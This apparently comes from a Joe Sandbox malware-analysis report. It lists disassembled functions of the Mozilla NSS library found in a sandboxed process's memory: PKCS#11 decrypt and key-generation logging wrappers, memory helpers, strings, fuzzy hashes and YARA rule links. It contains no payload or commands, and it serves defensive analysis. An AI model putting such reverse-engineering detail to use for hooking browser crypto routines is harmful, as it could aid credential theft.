PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6BBE8A4B
PR_LogPrint.NSS3( pTemplate = 0x%p,?), ref: 6BBE8A67
PR_LogPrint.NSS3( ulCount = %d,?), ref: 6BBE8A83
PR_LogPrint.NSS3( phKey = 0x%p,?), ref: 6BBE8AA1
PL_strncpyz.NSS3(?, *phKey = 0x%x,00000050), ref: 6BBE8B43
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6BBE8B52
PR_LogPrint.NSS3(?,00000000), ref: 6BBE8B68

Strings

phKey = 0x%p, xrefs: 6BBE8A9C
(CK_INVALID_HANDLE), xrefs: 6BBE8A0C, 6BBE8B4B
*phKey = 0x%x, xrefs: 6BBE8B2D, 6BBE8B3D
C_GenerateKey, xrefs: 6BBE89D1
hSession = 0x%x, xrefs: 6BBE89EE, 6BBE89FE
pMechanism = 0x%p, xrefs: 6BBE8A46
pTemplate = 0x%p, xrefs: 6BBE8A62
ulCount = %d, xrefs: 6BBE8A7E

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *phKey = 0x%x$ hSession = 0x%x$ pMechanism = 0x%p$ pTemplate = 0x%p$ phKey = 0x%p$ ulCount = %d$ (CK_INVALID_HANDLE)$C_GenerateKey
API String ID: 1003633598-2039122979
Opcode ID: cbb14d3f6077864d1d50089f544f7767ea16cc85fd86e70123eac9db3ba33724
Instruction ID: 2b5eac1669d2e8dc32b444bfc5a6e444e3948dbd0daf5b4050ed49bb42ba0ed4
Opcode Fuzzy Hash: cbb14d3f6077864d1d50089f544f7767ea16cc85fd86e70123eac9db3ba33724
Instruction Fuzzy Hash: A751C274650244AFEB00DF24DC86F5F7765EB4234DF444068E9086B222EB3ADA57CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 6BBCAB90 Relevance: 33.4, APIs: 22, Instructions: 388COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6BBCABCB
EnterCriticalSection.KERNEL32 ref: 6BBCABE4
TlsGetValue.KERNEL32 ref: 6BBCAC0B
PR_Unlock.NSS3 ref: 6BBCAC7B
TlsGetValue.KERNEL32 ref: 6BBCAC9C
EnterCriticalSection.KERNEL32 ref: 6BBCACB5
PR_WaitCondVar.NSS3 ref: 6BBCACD5
TlsGetValue.KERNEL32 ref: 6BBCACF4

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: Value$CriticalEnterSection$CondUnlockWait
String ID:
API String ID: 839227765-0
Opcode ID: 52fa32d387027f8220d63ed7baf59f4dcf9cfe420cba73beed94603a4d3d8888
Instruction ID: 2316938cc2b1f176c6bf0f5d5514db5c3f54093a1b9695eaeee3f73d97b63776
Opcode Fuzzy Hash: 52fa32d387027f8220d63ed7baf59f4dcf9cfe420cba73beed94603a4d3d8888
Instruction Fuzzy Hash: E9F149B09047858FEB10DF78C58575ABBF0FF06308F4085A9D8998B255EB39E985CF92

Uniqueness

Uniqueness Score: -1.00%

Function 6BBEAB10 Relevance: 33.4, APIs: 10, Strings: 9, Instructions: 127COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DecryptMessageNext), ref: 6BBEAB36
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6BBEAB64
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6BBEAB73

Part of subcall function 6BCCD930: PL_strncpyz.NSS3(?,?,?), ref: 6BCCD963

PR_LogPrint.NSS3(?,00000000), ref: 6BBEAB89
PR_LogPrint.NSS3( pParameter = 0x%p,?), ref: 6BBEABAB
PR_LogPrint.NSS3( ulParameterLen = 0x%p,?), ref: 6BBEABC6
PR_LogPrint.NSS3( pCiphertextPart = 0x%p,?), ref: 6BBEABE1
PR_LogPrint.NSS3( ulCiphertextPartLen = %d,?), ref: 6BBEABFC
PR_LogPrint.NSS3( pPlaintextPart = 0x%p,?), ref: 6BBEAC17
PR_LogPrint.NSS3( pulPlaintextPartLen = 0x%p,?), ref: 6BBEAC30

Strings

ulCiphertextPartLen = %d, xrefs: 6BBEABF7
pParameter = 0x%p, xrefs: 6BBEABA6
(CK_INVALID_HANDLE), xrefs: 6BBEAB6C
pCiphertextPart = 0x%p, xrefs: 6BBEABDC
pulPlaintextPartLen = 0x%p, xrefs: 6BBEAC2B
hSession = 0x%x, xrefs: 6BBEAB4E, 6BBEAB5E
ulParameterLen = 0x%p, xrefs: 6BBEABC1
C_DecryptMessageNext, xrefs: 6BBEAB31
pPlaintextPart = 0x%p, xrefs: 6BBEAC12

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pCiphertextPart = 0x%p$ pParameter = 0x%p$ pPlaintextPart = 0x%p$ pulPlaintextPartLen = 0x%p$ ulCiphertextPartLen = %d$ ulParameterLen = 0x%p$ (CK_INVALID_HANDLE)$C_DecryptMessageNext
API String ID: 1003633598-206538543
Opcode ID: bc459479d30b344e77832a9fa945ecd42bcd96d2159475713e8ed8dcfd4badb8
Instruction ID: 1fbd50d0099b8c73fe3e837da5d53bd01a8a29c7186f7c2bcc83fefbbeaecea3
Opcode Fuzzy Hash: bc459479d30b344e77832a9fa945ecd42bcd96d2159475713e8ed8dcfd4badb8
Instruction Fuzzy Hash: CE41D235550144AFEB00DF60DD46F4E7BB6EB5634EF884064E5086B231E73ACA56CF62

Uniqueness

Uniqueness Score: -1.00%

Function 6BC1C980 Relevance: 33.3, APIs: 22, Instructions: 298memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000400,6BC1AEB0,?,00000004,00000001,?,00000000,?,?), ref: 6BC1C98E

Part of subcall function 6BC10FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6BBB87ED,00000800,6BBAEF74,00000000), ref: 6BC11000
Part of subcall function 6BC10FF0: PR_NewLock.NSS3(?,00000800,6BBAEF74,00000000), ref: 6BC11016
Part of subcall function 6BC10FF0: PL_InitArenaPool.NSS3(00000000,security,6BBB87ED,00000008,?,00000800,6BBAEF74,00000000), ref: 6BC1102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,6BC1AEB0,?,00000004,00000001,?,00000000,?,?), ref: 6BC1C9A1

Part of subcall function 6BC110C0: TlsGetValue.KERNEL32(?,6BBB8802,00000000,00000008,?,6BBAEF74,00000000), ref: 6BC110F3
Part of subcall function 6BC110C0: EnterCriticalSection.KERNEL32(?,?,6BBB8802,00000000,00000008,?,6BBAEF74,00000000), ref: 6BC1110C
Part of subcall function 6BC110C0: PL_ArenaAllocate.NSS3(?,?,?,6BBB8802,00000000,00000008,?,6BBAEF74,00000000), ref: 6BC11141
Part of subcall function 6BC110C0: PR_Unlock.NSS3(?,?,?,6BBB8802,00000000,00000008,?,6BBAEF74,00000000), ref: 6BC11182
Part of subcall function 6BC110C0: TlsGetValue.KERNEL32(?,6BBB8802,00000000,00000008,?,6BBAEF74,00000000), ref: 6BC1119C

SECOID_FindOIDByTag_Util.NSS3(0000001A,?,?,?,6BC1AEB0,?,00000004,00000001,?,00000000,?,?), ref: 6BC1C9D3

Part of subcall function 6BC10840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6BC108B4

SECITEM_CopyItem_Util.NSS3(00000000,-00000018,00000000,?,?,?,?,6BC1AEB0,?,00000004,00000001,?,00000000,?,?), ref: 6BC1C9E6

Part of subcall function 6BC0FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6BC08D2D,?,00000000,?), ref: 6BC0FB85
Part of subcall function 6BC0FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6BC0FBB1

PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,6BC1AEB0,?,00000004,00000001,?,00000000,?,?), ref: 6BC1C9F5
PORT_ArenaAlloc_Util.NSS3(00000000,00000050,?,?,?,?,?,?,?,6BC1AEB0,?,00000004,00000001,?,00000000,?), ref: 6BC1CA0A
SEC_ASN1EncodeInteger_Util.NSS3(00000000,00000000,00000001,?,?,?,?,?,?,?,?,?,6BC1AEB0,?,00000004,00000001), ref: 6BC1CA33
SECOID_FindOIDByTag_Util.NSS3(00000019,?,?,?,?,?,?,?,?,?,?,?,?,6BC1AEB0,?,00000004), ref: 6BC1CA4D
SECITEM_CopyItem_Util.NSS3(00000001,?,00000000), ref: 6BC1CA60
SEC_PKCS7DestroyContentInfo.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6BC1AEB0,?,00000004), ref: 6BC1CA6D
PR_Now.NSS3 ref: 6BC1CAD6
PORT_ArenaMark_Util.NSS3(00000000), ref: 6BC1CB23
PORT_ArenaAlloc_Util.NSS3(00000000,0000005C), ref: 6BC1CB32
SEC_ASN1EncodeInteger_Util.NSS3(00000000,00000000,00000001), ref: 6BC1CB64
SECOID_SetAlgorithmID_Util.NSS3(00000000,?,00000001,00000000), ref: 6BC1CBBB
PORT_ArenaAlloc_Util.NSS3(?,00000008), ref: 6BC1CBD0
PORT_ArenaAlloc_Util.NSS3(00000000,00000018), ref: 6BC1CBF6
PORT_ArenaAlloc_Util.NSS3(00000000,00000008), ref: 6BC1CC18
SECOID_SetAlgorithmID_Util.NSS3(00000000,00000000,00000001,00000000), ref: 6BC1CC39
PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6BC1CC5B

Part of subcall function 6BC110C0: PL_ArenaAllocate.NSS3(?,6BBB8802,00000000,00000008,?,6BBAEF74,00000000), ref: 6BC1116E

PORT_ArenaAlloc_Util.NSS3(00000000,00000008), ref: 6BC1CC69
SECITEM_CopyItem_Util.NSS3(00000000,?,00000000), ref: 6BC1CC89

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: Util$Arena$Alloc_$CopyItem_$AlgorithmAllocateArena_EncodeFindInteger_Tag_Value$ContentCriticalDestroyEnterErrorFreeInfoInitLockMark_PoolSectionUnlockcallocmemcpy
String ID:
API String ID: 1766420342-0
Opcode ID: 2f8cba23f3fac309584e146d15c7f0ced47c377b89244ed76a14b3b4e2496fad
Instruction ID: 48a2b83c5f50fb380d097a97dd91d0b5866b1cc57ed41e3efe774ba07be2d290
Opcode Fuzzy Hash: 2f8cba23f3fac309584e146d15c7f0ced47c377b89244ed76a14b3b4e2496fad
Instruction Fuzzy Hash: 39B191B5E152069FEB01CF64DC41BAA7BB4BF29308F004175E814BB251FB79DA90DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6BBE6960 Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 119COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DecryptUpdate), ref: 6BBE6986
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6BBE69B4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6BBE69C3

Part of subcall function 6BCCD930: PL_strncpyz.NSS3(?,?,?), ref: 6BCCD963

PR_LogPrint.NSS3(?,00000000), ref: 6BBE69D9
PR_LogPrint.NSS3( pEncryptedPart = 0x%p,?), ref: 6BBE69FA
PR_LogPrint.NSS3( ulEncryptedPartLen = %d,?), ref: 6BBE6A13
PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6BBE6A2C
PR_LogPrint.NSS3( pulPartLen = 0x%p,?), ref: 6BBE6A47
PR_LogPrint.NSS3( *pulPartLen = 0x%x,?), ref: 6BBE6AB9

Strings

pEncryptedPart = 0x%p, xrefs: 6BBE69F5
C_DecryptUpdate, xrefs: 6BBE6981
pulPartLen = 0x%p, xrefs: 6BBE6A42
pPart = 0x%p, xrefs: 6BBE6A27
(CK_INVALID_HANDLE), xrefs: 6BBE69BC
ulEncryptedPartLen = %d, xrefs: 6BBE6A0E
hSession = 0x%x, xrefs: 6BBE699E, 6BBE69AE
*pulPartLen = 0x%x, xrefs: 6BBE6AB4

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulPartLen = 0x%x$ hSession = 0x%x$ pEncryptedPart = 0x%p$ pPart = 0x%p$ pulPartLen = 0x%p$ ulEncryptedPartLen = %d$ (CK_INVALID_HANDLE)$C_DecryptUpdate
API String ID: 1003633598-2105479268
Opcode ID: 37b7ebf60c85bd653b64cc7e1f9cc100c2d43a40f06fb8201dcb610722559681
Instruction ID: a072474600bacb10b5210856f94aa432998fb34cc755da951f68f76ffc51bd56
Opcode Fuzzy Hash: 37b7ebf60c85bd653b64cc7e1f9cc100c2d43a40f06fb8201dcb610722559681
Instruction Fuzzy Hash: 5A412B75910144EFEB00DF20DC46F4E7BA1EB4634DF448064E6099B121EB39DE56CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 6BBB4AF0 Relevance: 27.4, APIs: 18, Instructions: 355memorystringthreadCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000,00000000,00000000,?,?,6BBF1444,?,?,00000000,?,?), ref: 6BBB4BD4

Part of subcall function 6BBF0C90: PR_SetError.NSS3(00000000,00000000,6BBF1444,?,00000001,?,00000000,00000000,?,?,6BBF1444,?,?,00000000,?,?), ref: 6BBF0CB3

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6BBF1444), ref: 6BBB4B87
memcpy.VCRUNTIME140(00000000,?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6BBB4BA5

Part of subcall function 6BC088E0: TlsGetValue.KERNEL32(00000000,?,?,6BC108AA,?), ref: 6BC088F6
Part of subcall function 6BC088E0: EnterCriticalSection.KERNEL32(?,?,?,?,6BC108AA,?), ref: 6BC0890B
Part of subcall function 6BC088E0: PR_NotifyCondVar.NSS3(?,?,?,?,?,6BC108AA,?), ref: 6BC08936
Part of subcall function 6BC088E0: PR_Unlock.NSS3(?,?,?,?,?,6BC108AA,?), ref: 6BC08940

PR_SetError.NSS3(FFFFE02A,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6BBB4DF5
PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 6BBB4B94

Part of subcall function 6BC110C0: TlsGetValue.KERNEL32(?,6BBB8802,00000000,00000008,?,6BBAEF74,00000000), ref: 6BC110F3
Part of subcall function 6BC110C0: EnterCriticalSection.KERNEL32(?,?,6BBB8802,00000000,00000008,?,6BBAEF74,00000000), ref: 6BC1110C
Part of subcall function 6BC110C0: PL_ArenaAllocate.NSS3(?,?,?,6BBB8802,00000000,00000008,?,6BBAEF74,00000000), ref: 6BC11141
Part of subcall function 6BC110C0: PR_Unlock.NSS3(?,?,?,6BBB8802,00000000,00000008,?,6BBAEF74,00000000), ref: 6BC11182
Part of subcall function 6BC110C0: TlsGetValue.KERNEL32(?,6BBB8802,00000000,00000008,?,6BBAEF74,00000000), ref: 6BC1119C

free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6BBF1444,?), ref: 6BBB4BC2
PR_GetCurrentThread.NSS3(?,?,?,?,?,00000000,00000000), ref: 6BBB4BEF
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6BBF1444), ref: 6BBB4C27
SECITEM_CompareItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,?,6BBF1444), ref: 6BBB4C42
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6BBB4D5A
PORT_ArenaAlloc_Util.NSS3(00000000,00000001), ref: 6BBB4D67
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6BBB4D78
PR_SetError.NSS3(FFFFE001,00000000), ref: 6BBB4DE4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6BBB4E4C
PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6BBB4E5B
memcpy.VCRUNTIME140(00000000,00000000,00000001), ref: 6BBB4E6C

Part of subcall function 6BBB4880: PR_SetError.NSS3(FFFFE005,00000000), ref: 6BBB48A2

SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6BBB4EF1
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6BBB4F02

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: Util$Error$Arena$Alloc_Item_Valuememcpystrlen$CriticalEnterSectionUnlockZfree$AllocateArena_CompareCondCurrentFreeNotifyThreadfree
String ID:
API String ID: 24311736-0
Opcode ID: 7f01b3a00f18e8800cb144e553bb03fab57d9ba77f56fcff5390babc36dab503
Instruction ID: dab50cda7e6c2ad7719acc0fc632665417d11142b1973e2eaf6b4ed7f8655cf2
Opcode Fuzzy Hash: 7f01b3a00f18e8800cb144e553bb03fab57d9ba77f56fcff5390babc36dab503
Instruction Fuzzy Hash: 43C12DB5E102559FEB00CF68DC81BAF77B8FF19714F040469E815A7341EB79EA148BA2

Uniqueness

Uniqueness Score: -1.00%

Function 6BBEA9A0 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DecryptMessageBegin), ref: 6BBEA9C6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6BBEA9F4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6BBEAA03

Part of subcall function 6BCCD930: PL_strncpyz.NSS3(?,?,?), ref: 6BCCD963

PR_LogPrint.NSS3(?,00000000), ref: 6BBEAA19
PR_LogPrint.NSS3( pParameter = 0x%p,?), ref: 6BBEAA3A
PR_LogPrint.NSS3( ulParameterLen = 0x%p,?), ref: 6BBEAA55
PR_LogPrint.NSS3( pAssociatedData = 0x%p,?), ref: 6BBEAA6E
PR_LogPrint.NSS3( ulAssociatedDataLen = 0x%p,?), ref: 6BBEAA87

Strings

pAssociatedData = 0x%p, xrefs: 6BBEAA69
pParameter = 0x%p, xrefs: 6BBEAA35
(CK_INVALID_HANDLE), xrefs: 6BBEA9FC
hSession = 0x%x, xrefs: 6BBEA9DE, 6BBEA9EE
C_DecryptMessageBegin, xrefs: 6BBEA9C1
ulParameterLen = 0x%p, xrefs: 6BBEAA50
ulAssociatedDataLen = 0x%p, xrefs: 6BBEAA82

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pAssociatedData = 0x%p$ pParameter = 0x%p$ ulAssociatedDataLen = 0x%p$ ulParameterLen = 0x%p$ (CK_INVALID_HANDLE)$C_DecryptMessageBegin
API String ID: 1003633598-2188218412
Opcode ID: 0a11861ee2538c0f4120afd5006eb3f50571fa160cea161439be4bb12e7e0e33
Instruction ID: 6739ed76c2808b3f2fdff86553627d3c9223c706b2d0de09a861d93c0faeb600
Opcode Fuzzy Hash: 0a11861ee2538c0f4120afd5006eb3f50571fa160cea161439be4bb12e7e0e33
Instruction Fuzzy Hash: 80312675610244EFEB00DF60DD8AF5EB7B5EB4234DF884024E508AB121EB39CA56CB72

Uniqueness

Uniqueness Score: -1.00%

Function 6BBE6AF0 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 101COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DecryptFinal), ref: 6BBE6B16
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6BBE6B44
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6BBE6B53

Part of subcall function 6BCCD930: PL_strncpyz.NSS3(?,?,?), ref: 6BCCD963

PR_LogPrint.NSS3(?,00000000), ref: 6BBE6B69
PR_LogPrint.NSS3( pLastPart = 0x%p,?), ref: 6BBE6B85
PR_LogPrint.NSS3( pulLastPartLen = 0x%p,?), ref: 6BBE6BA0
PR_LogPrint.NSS3( *pulLastPartLen = 0x%x,?), ref: 6BBE6C0A

Strings

C_DecryptFinal, xrefs: 6BBE6B11
pLastPart = 0x%p, xrefs: 6BBE6B80
(CK_INVALID_HANDLE), xrefs: 6BBE6B4C
*pulLastPartLen = 0x%x, xrefs: 6BBE6C05
hSession = 0x%x, xrefs: 6BBE6B2E, 6BBE6B3E
pulLastPartLen = 0x%p, xrefs: 6BBE6B9B

Memory Dump Source

Source File: 00000001.00000002.2519832778.000000006BB31000.00000020.00000001.01000000.00000014.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000001.00000002.2519814205.000000006BB30000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519955302.000000006BCCF000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2519987562.000000006BD0E000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520004153.000000006BD0F000.00000008.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520022892.000000006BD10000.00000004.00000001.01000000.00000014.sdmpDownload File
Associated: 00000001.00000002.2520038961.000000006BD15000.00000002.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb30000_u5c4.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulLastPartLen = 0x%x$ hSession = 0x%x$ pLastPart = 0x%p$ pulLastPartLen = 0x%p$ (CK_INVALID_HANDLE)$C_DecryptFinal
API String ID: 1003633598-2565524109
Opcode ID: 1192258333e4cc0e52b496a2a39092c38a5089ca61ee499f02810ebc3600642e
Instruction ID: 599408d98212d21687ea4537e80adb7932e618e997bbe638724dcd09202f3260
Opcode Fuzzy Hash: 1192258333e4cc0e52b496a2a39092c38a5089ca61ee499f02810ebc3600642e
Instruction Fuzzy Hash: F931E375640144EBEB00DF74DC87F1E77A5EB4235DF884068E6099B221EB39DA46CB72

Uniqueness

Uniqueness Score: -1.00%

Function 6BBF29A0 Relevance: 22.8, APIs: 15, Instructions: 292COMMON

Download Yara Rule

APIs

PK11_ImportPublicKey.NSS3(00000000,?,00000000,?,?,?,?,?,6BBC6A5E,00000001,00000000,?,6BBC6540,?,0000000D,00000000), ref: 6BBF2A39
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6BBC6A5E,00000001,00000000,?,6BBC6540,?,0000000D,00000000), ref: 6BBF2A5B
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,6BBC6A5E,00000001,00000000,?,6BBC6540,?,0000000D), ref: 6BBF2A6F
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6BBC6A5E,00000001), ref: 6BBF2AAD
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6BBC6A5E,00000001,00000000), ref: 6BBF2ACB
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6BBC6A5E,00000001), ref: 6BBF2ADF
PR_Unlock.NSS3(?), ref: 6BBF2B38
PR_Unlock.NSS3(?), ref: 6BBF2B8B

Part of subcall function 6BBA07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6BB3204A), ref: 6BBA07AD
Part of subcall function 6BBA07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6BB3204A), ref: 6BBA07CD
Part of subcall function 6BBA07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6BB3204A), ref: 6BBA07D6
Part of subcall function 6BBA07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6BB3204A), ref: 6BBA07E4
Part of subcall function 6BBA07A0: TlsSetValue.KERNEL32(00000000,?,6BB3204A), ref: 6BBA0864
Part of subcall function 6BBA07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6BBA0880
Part of subcall function 6BBA07A0: TlsSetValue.KERNEL32(00000000,?,?,6BB3204A), ref: 6BBA08CB
Part of subcall function 6BBA07A0: TlsGetValue.KERNEL32(?,?,6BB3204A), ref: 6BBA08D7
Part of subcall function 6BBA07A0: TlsGetValue.KERNEL32(?,?,6BB3204A), ref: 6BBA08FB

